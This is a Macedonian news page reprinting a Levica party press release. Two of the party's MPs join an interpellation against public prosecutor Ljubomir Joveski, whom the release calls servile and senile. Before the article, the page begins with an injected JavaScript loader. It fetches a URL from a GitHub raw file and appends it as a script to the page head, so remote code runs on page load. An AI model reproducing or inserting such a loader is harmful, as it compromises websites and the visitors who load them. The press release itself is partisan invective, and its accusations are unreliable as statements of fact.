;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Пратениците на Левица се приклучија кон интерпелацијата против Републичкиот јавен обвинител – Љубомир Јовески - Антропол
АктуелноЛокално

Пратениците на Левица се приклучија кон интерпелацијата против Републичкиот јавен обвинител – Љубомир Јовески

Ја информираме јавноста дека двајцата пратеници на Политичката партија Левица – Димитар Апасиев и Борислав Крмов, се приклучија како предлагачи на Интерпелацијата за работата на Јавниот обвинител на Република Македонија – Љубомир Јовески, која претходно беше поднесена од група од седум опозициски пратеници.

Алармираме дека од поставувањето на чело на Јавното обвинителство на РМ, Јовески смислено и сервилно се стави во улога на ангел-чувар на крупниот организиран криминал, додека кривичниот прогон е резервиран само за ситните престапници. Неспособниот и сенилен Јовески, кој очекува како награда за неговата послушност кон корумпираните властодржци, да биде избран за судија на Уставниот суд – ја сведе оваа важна институција задолжена да се бори со криминалот, на карикатура која е приврзок на антинародниот хибриден режим предводен од СДС, ДУИ и ДПМНЕ.

Дополнително, неговата поспаност во трагичните случаи „Дурмо Турс“, „Беса Транс“, Модуларна болница Тетово, Клиниката за онкологија и многу други – само ги потврдуваат впечатоците на јавноста дека дотичниот лик, кој никогаш во животот не застапувал обвинение пред суд, не е способен да ја врши оваа важна правосудна функција, па наместо него беше оставено истражувачки новинари да ја работат работата за која се платени истражителите и обвинителите – што е недопустливо.

Ги повикуваме сите пратеници, и од власта и од опозицијата, да ја поддржат оваа интерпелација и заедно да ставиме крај на патернализмот на јавниот обвинител Љубомир Јовески кон мафијата, потпомогната од олигарсите и корумпираните функционери на власта.

Го повикуваме и собранискиот спикер Талат Џафери, што побргу да ја стави како точка на дневен ред оваа интерпелација, за да можеме – од собраниската говорница – аргументирано да продискутираме за сите негативни и штетни аспекти од неработењето на овој недостоинствен властелински послушник, кој не ужива никаков углед и професионален кредибилитет во кривично-правната фела.